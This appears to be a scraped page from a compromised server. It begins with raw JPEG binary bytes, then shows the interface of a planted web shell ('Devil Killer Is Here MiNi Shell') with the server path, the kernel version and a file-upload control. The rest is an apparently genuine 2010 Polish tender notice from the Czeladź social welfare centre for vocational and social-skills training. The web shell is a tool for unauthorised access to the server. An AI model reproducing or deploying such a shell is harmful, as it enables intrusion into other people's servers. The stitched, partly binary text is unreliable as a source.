JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/251305-N-2010.html

<p class="kh_header"><b>Czeladź: Szkolenia zawodowe oraz szkolenia z zakresu psychologiczno-doradczego w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r.</b><br>
<b>Numer ogłoszenia: 251305 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 17 Lipca 27, 41-250 Czeladź, woj. śląskie, tel. 032 2651442, faks 032 2656811 w. 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.czeladz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenia zawodowe oraz szkolenia z zakresu psychologiczno-doradczego w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa obejmująca organizowanie i przeprowadzenie szkoleń  zawodowych, szkoleń w formie treningu umiejętności i kompetencji społecznych w dziedzinie rozwoju osobistego oraz  doradztwo zawodowe i poradnictwo prawne dla podopiecznych MOPS, w ramach projektu współfinansowanego ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w  2010r.

Zamówienie zostało podzielone na 3części:

Część I
Organizacja i przeprowadzenie szkolenia wyjazdowego z zakresu treningu umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe 
CPV: 
80 50 00 00 - 9 usługi szkoleniowe
80 57 00 00 -  0 usługi szkolenia w dziedzinie rozwoju osobistego
80 53 00 00 -  8 usługi szkolenia psychospołecznego
85 31 23 20 - 8 doradztwo zawodowe
55 00 00 00 -  0 Usługi restauracyjne, hotelarskie i handli detalicznego

Liczba osób i czas trwania szkolenia
W szkoleniu powyższym będzie uczestniczyć grupa 10 osób niepełnosprawnych z umiarkowanym i lekkim stopniem niepełnosprawności (choroby układu oddechowego i krążenia, ruchowe, neurologiczne, psychiczne), będące w wieku aktywności zawodowej, korzystające ze świadczeń pomocy społecznej, zagrożone wykluczeniem społecznym. Realizacja szkolenia trwać będzie 7 dni (6 noclegów) i musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych umiejętności, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 

Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).

Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
strategia definiowania i rozwiązywania problemów życiowych,
zarządzanie czasem własnym oraz budżetem gospodarstwa domowego,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
nauka niezależnego funkcjonowania z niepełnosprawnością

Program zajęć powinien zawierać w szczególności:
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia,
wymagania wstępne dla uczestników szkolenia,
cele szkolenia,
plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
sposób sprawdzania efektów szkolenia.

Część II (A+B)
Zadanie A
Nazwa szkolenia:Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe + poradnictwo prawne
kod CPV:
80 50 00 00 - 9 usługi szkoleniowe
79 14 00 00 - 7 doradztwo prawne 
85 31 23 20 - 8 doradztwo zawodowe
80 50 00 00 - 9 usługi rehabilitacji zawodowej
80 51 00 00 - 2  usługo szkolenia specjalistycznego

Liczba osób: 10 osób oraz 5 dzieci objętych opieką  
Termin realizacji zamówienia: od dnia podpisania umowy do 31.12.2010r
Cel szkolenia: Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 

Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 70 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia  winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
nauka konstruktywnego reagowania na sytuacje konfliktowe,
nauka konstruktywnego wyrażania emocji i radzenia sobie z nimi,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
strategia definiowania i rozwiązywania problemów życiowych,
zarządzanie czasem własnym oraz budżetem gospodarstwa domowego,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
elementy prawa pracy, rodzinnego, cywilnego,
Program zajęć powinien zawierać w szczególności:
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia,
wymagania wstępne dla uczestników szkolenia,
cele szkolenia,
plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
sposób sprawdzania efektów szkolenia.
Zadanie B
Nazwa szkolenia: Trening umiejętności społecznych + indywidualne i grupowe doradztwo zawodowe- 
kod CPV:
80 50 00 00 - 9 usługi szkoleniowe
79 14 00 00 - 7 doradztwo prawne 
85 31 23 20 - 8 doradztwo zawodowe
80 57 00 00 -  0 usługi szkolenia w dziedzinie rozwoju osobistego

Liczba osób:  30 osób.
Czas trwania szkolenia:  od dnia podpisania umowy do 31.12.2010r
W szkoleniu powyższym będzie uczestniczyć grupa 30 osób. Realizacja szkolenia musi zakończyć się do 31.12.2010r. Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na
rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 

Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 35 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do piątku po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Zakres tematyczny kursu powinien m.in. obejmować:
komunikacja interpersonalna,
asertywność,
motywacja do zmiany, 
sporządzanie osobistego bilansu osiągnięć,
podniesienie kompetencji osobistych, 
budowanie poczucia własnej wartości,
badanie predyspozycji zawodowych,
sporządzanie planu kariery zawodowej,
metody i sposoby poszukiwania pracy,
kreowanie wizerunku zawodowego,
autoprezentacja, wpływ wizerunku na powodzenie w rozmowie kwalifikacyjnej,
Program zajęć powinien zawierać w szczególności:
nazwę i zakres szkolenia,
czas trwania i sposób organizacji szkolenia,
wymagania wstępne dla uczestników szkolenia,
cele szkolenia,
plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej,
treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
sposób sprawdzania efektów szkolenia.


Część III
kod CPV - 80530000-8 - usługi szkolenia zawodowego
Nazwa kursu/szkolenia: Kurs ochrony osób i mienia

Usługi szkolenia zawodowego. Przewidziano do przeszkolenia 4 osoby. 

Cel szkolenia:  Ukończenie kursu umożliwi jego uczestnikom zdobycie nowych uprawnień, uaktywni ich na rynku pracy - a tym samym zwiększy ich szanse na zatrudnienie. 
Liczba osób: 4 osoby
Termin realizacji zamówienia: od  dnia podpisania umowy do 31.12.2010r
Liczba godzin szkolenia
Należy przedstawić program wszystkich zajęć obejmujący minimum 250 godzin dydaktycznych (godzina szkolenia = godzina lekcyjna =  45 min).
Zajęcia teoretyczne i praktyczne winny odbywać się od poniedziałku do soboty po max 7 godz. lekcyjnych.
Przykładowy zakres tematyczny szkolenia
Program kursu powinien obejmować m. in.:
- blok ogólnoprawny, 
- ochrony mienia, 
- ochrony osób, 
- wyszkolenia strzeleckiego oraz samoobrony,
- technik interwencyjnych.
Program zajęć powinien zawierać w szczególności:
- nazwę i zakres szkolenia,
- czas trwania i sposób organizacji szkolenia,
- wymagania wstępne dla uczestników szkolenia,
- cele szkolenia,
- plan nauczania określający tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem,   w miarę potrzeby, części teoretycznej i części praktycznej,
- treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
- wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
- sposób sprawdzania efektów szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.57.00.00-0, 85.31.23.20-8, 79.14.00.00-7, 55.00.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie:
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu usług, wykonanych lub wykonywanych,  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania     i odbiorców, oraz załączeniem dokumentu (np. referencje)  potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
Wykaz wyżej wymienionych usług winien zawierać co najmniej jedną usługę szkoleniową,  o wartości brutto nie mniejszej niż: 
dla Części I     -  15 000,00 zł
dla Części 2   -   45 000,00 zł
dla Części 3   -     6 000,00 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia  na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia na podstawie: 
-oświadczenia o spełnianiu warunków udziału w postępowaniu, 
-wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za świadczenie usług, którymi Wykonawca dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu niniejszego zamówienia,
-oświadczenia Wykonawcy o posiadaniu wymaganych uprawnień przez osoby wskazane w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Metodą spełnia - nie spełnia  na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony formularz oferty z kompletem załączników;
2. Pisemne zobowiązania podmiotów oddających Wykonawcy do dyspozycji niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów. 
3.Pełnomocnictwo, określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
4.Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego wykonawców występujących wspólnie w przypadku wspólnego ubiegania się o udzielenie zamówienia.

Przed podpisaniem umowy Wykonawca powinien przedstawić następujące dokumenty:

1. Zaświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy Wojewódzki Urząd Pracy oraz informacje o kontynuowaniu działalności szkoleniowej w 2010r. - dotyczy wszystkich części zamówienia.

2. W przypadku wybrania oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców (art.23 ust. 4 Ustawy).

3.W przypadku wybrania oferty osoby (osób) fizycznych prowadzącej działalność gospodarczą Zamawiający będzie wymagał przed zawarciem umowy przedstawienia aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy zgodnie z art. 144 ustawy Pzp w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w szczególności w przypadku:
1. zmiany terminu realizacji przedmiotu zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez strony.
2. zmiany ilości osób (uczestników szkolenia oraz dzieci do opieki) na podstawie obiektywnych przesłanek nie dających się przewidzieć np. niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie, przerwania uczestnictwa w szkoleniu (np. podjęcie zatrudnienia lub innej pracy zarobkowej, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy.
Wystąpienie następujących okoliczności ze strony Wykonawcy:
1. zmiana kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy umowy cywilnoprawnej), których nie można było przewidzieć w dniu zawarcia umowy pod warunkiem, że nowo wskazany wykładowca będzie spełniał wymagania wskazane w SIWZ.
2. zmiana miejsca wykonywania zamówienia pod warunkiem, że nowe miejsce wykonania zamówienia zlokalizowane będzie zgodnie z warunkami wskazanymi w SIWZ.
Zmiana nastąpi w formie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.czeladz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. 17 lipca 27 Czeladź , pokój nr 4, tel. 032/265-68-11 wewn. 31, fax. 032/ 265 - 14 - 42, e- mail: administracyjny.mops@mops.czeladz.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. 17 lipca 27 Czeladź , pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków EFS pt. Bez ograniczeń. Program zwiększenia kompetencji zawodowych i społecznych oraz aktywizacja na rynku pracy osób korzystających z pomocy Miejskiego Ośrodka Pomocy Społecznej w Czeladzi  w ramach PO KL 2007 - 2013 w..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
